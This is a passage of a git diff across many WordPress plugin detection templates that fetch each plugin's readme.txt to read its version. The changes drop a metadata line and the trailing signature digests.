body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220781c33df6027e7b93bf13b8b7645ee0b714f42deb82b860ed8e44ca1c9bb8fb10220052fc99d77eeb0913585b434531742e0d5261cb199c46d1b7069258fd7565f09:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 2f50b245bd..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/members/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200accc16260474c5ba5fec9db924b91fe38e8b8d65a7e217d31af19930d29e2dc022100f0f6ded418247f71f407bc127e385f4c66e200f5b6f6b636a17d518f3210a19a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index cef6400df9..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022057e1282a3b121e86857729f08a74d5315f50058b486ef6a9c5c53f03a05c2714022100fbdc79c37773722bacd7301effaad83ae7ec52c61d07d312be1e38b4961db0b1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index fbb0372fe8..fe5017885a 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/metform/ metadata: - max-request: 1 plugin_namespace: metform wpscan: https://wpscan.com/plugin/metform tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/metform/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e064abae4d95807316c3d94b9cefbeba14e6e6f0d3d8ae2e7140fa8c36e1897402201e4b9d5159f62846b9d3bd66a33fe633d7b2d2f1eb51022ec94c6b88fd02a693:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3721f693ee..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ml-slider/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100bc340b08f0f1a8751468ae2431bb14e37e72e088e9bcb154f30d106213e61011022100840e0288abe875e8602c8226521d1abf02cb05aeca2401656721d21a96dc84e6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index d843ebdc6a..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/newsletter/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220417d7d9717600538a8d7b7336ec6970691d784a25e6515f81da025a5fd9aaa610220623db75589f6e237e1b3565a94190d782b52f03925138a7129e6cce72e7706b7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ee630019b9..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/nextend-facebook-connect/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c06f7a748c54c3713d4e54939e68ab4409a7ed457cea5fd94805f16da65906f9022100b551fb12a625aa1c1a5ecdf06cb027dca670849cd23cab7b30d432e49e61c864:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 100fe8f8b4..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/nextgen-gallery/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204344fda651867a8dfed1eeeea27e615d78585d7b37cb435f8f18f5a4107f9d62022100ef3d7d88ae1458ef761565e6ce0cd1d3dbca3437fb2a472a8286d79f839b13e0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 48dadf5061..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204c368c7d091b41117e244e2fcedcf4b4f9e968854de808192b7d46820895eca0022014c1ff5be3465f158b3958f816e73df6f53f1b1a36bf8b0c7550e97d42633198:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 0907ca25a5..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201c2b44dee5e6108b5d323f407b4ddd5aef8cd5361544e92dff3fe6958619e780022100ae1b711e7e6039035be2415802a3b291b322189fb174d5992c456431e223e6dd:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index ea36f2894b..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/official-facebook-pixel/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008bb0f579520f85697c072afe476395cede6bcc04fc945da254fb4c17b685ee23022100ec00a2baf0c6ac6d730a9381ba7e9884596ada7e51d9ee6293d35d21a4adb1a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 02508af95d..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210097e7529b5fd9e3e095dc5c4e263f2e1dd21da5da11e85789702f34a1e47f18a302205521ca3c71d7b5fffe4bb74d6a523ecc9b43595e157b1fc2cc75095a963d63bb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 327bb26323..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/optinmonster/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a7197daed633df2ff96ad35de96791189e1cb4d4ffab115b7f894ddc5d519c7c022100870aab0c969919dcb7319ef9aa6ba285b72b7a296d35dd6d112a9ce50e257817:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index f2d41711d6..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/otter-blocks/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f2733ffcd1bddbd99bb655085c8f81373f572902fa1fde1b979db02b9aa4497f0220642718b59b53bf8995d592435d09efb328052b9506b6b7a3de09eb959204b22c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 8eb8a66adf..d2a91ecce8 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/password-protected/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201a827244c1fa88d3c9dcaebca1af8009b83fd09f97e7d6e0d52def2fce5109bf022100829c94a3a8524e570f106588f9975769a5d48e2fc830dfc8f4fdd90f89942f12:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index f600883b59..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/pdf-embedder/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100dfa0501018ce273015ca47fe984805a2fbff1668bf24ce8edd0a3d04a217129e02204458024510e19392c5b11a6a676675e735028c0d1415126c8a89b54180661cb3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index fc85284340..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/pinterest-for-woocommerce/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b213b9d1a18d9f82d090283853c03779441174d62be8447c13dc67db3275b004022100bba4afe145a8977e2c0848a88490927be06774821b9fec9dbeaa2d8b7ee8d583:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 1ad0e37d49..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202f0cdbdebc3ab88100e57ebb24a0b09f809298789a07f4683c43021f528bbaab022100f04a078bda92c95c2a064f290dd7b54dcdbe40ae950ebe034cd3a10f299de4b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 01d969bf4b..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/polylang/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a234d4f66c514afb18eb7cc65c4027e1b881f2379a834a7703ea842001ccac0602201b74dc897a5a5f5a49865856f6fde0262b1f24525f43e3aaa18fb894e8faa0d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b555a927c8..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220524e049b4626c711369236477fc25e1e3533b972c4aaca4986cf7896b817a80e022100a75569aa560b499e39b7046059b8df105d4cc0f2fe7502b8bd892b10af06e5a8:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index c6833d85e3..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fa192e18fe3254424f39dca7c5ba1d1fe47222740cdc7ed8de0ccd7d3a8c4a22022100f251b7a091b204789f1031503e26b02b3b4c67c3bbf06888c663ea25bf9b9dc8:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index be452ad4a8..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200eed052196ccda696bd7d290746d5328390d31fd3e4870bc2eb5237cc714d68d022100b06e7ee72f01c27be69d7e7b718ef88245742629da4321dd9e5cb9d3fafecba1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 47dba63dd2..56d2e4efcd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/post-types-order/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207d417a7b1429269ebd74b8ab0c61a0a19d4dc822ba3e8bbe1e5aac987e0f2c3f022100c9b29cde9c71920f504405eccf95e1668db856d76cba72a7a9552ca223f65eb0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 0183645d5a..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200d68d724c0881ca89cbcbe68c901871f1af8fd6a57eab703d7aec6d9b7395761022100e2684360c3606e1666bb3c220b38987a9adbe4a0c639617bc0dc7c612389fc85:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index c368c31185..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d74def239e5f9f165bcbd3965a7449f26917026f2eef2d421f33d23a5e54be75022100e50900d674e1f238466d97237b73726faf0b540889f8f808ea0579081131c4e5:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 315bdb848c..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ee3b7b5a4cb2ad37be8a33bd8afe95d6f84ad4aedff4567e0e01ec77777c1f6e022100bba0d3d2ba2d74f36061daad37284fd3a03a73d56266f1c0504d6fa2128fdb14:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 730d64a5cb..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/really-simple-ssl/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220038fcbc55c4749a79ec8e48d903e739b224d134b9a95b526df2e33b094ed18a902200df40c2859e58292335c8e3a5039ace532328d86e5611e936e03cada5c855967:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 3105c971b6..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/redirection/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210098e256d27853048e2ba1f51aeaf5676c45f679a5e15e18f17b4c78b4f8b121b90220256fbc8285cf6e10949acb645078aa9ddadfa635975b08d0a9bf27fd8c5396dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index fc8d89683c..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/redux-framework/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ad5814ad2cb4e97dc7dd6bf4dbd9f4c9f1169322a4bbf504e41154f1427fc5af022100f8cec484552c6512af7590cff1362b2ce30be579f40459079f52c0e0e17ad130:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index a962347b33..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/regenerate-thumbnails/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009a9779d09de64dcb835b8fcfb3eb11c6d2fd7d0106cef1e83a342b0f65f1dac9022052a970cfd3279bc5571ad7927d6726ded6808331aad59a282dfb200dabcb7824:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index db4053e12d..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220161ff2259da510daf482900fe46c053b54313d337dfd14b62cc0717969b8be7602206b4a89e63875c1dc8c3afd566fa49cb8fe953a9b77168b857b5f4302435576cf:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 4ea2b30467..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206cdb2ac4e3c992ba9732be187f91bf89c604aa79e30ce982027793e21d4af66c02210085ad381005be6426e2ad271a60ed3fd2f79c5f2a36edb84b535661c0fe56dc34:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index fcc6bc192d..dc3d446af3 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/sg-cachepress/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - 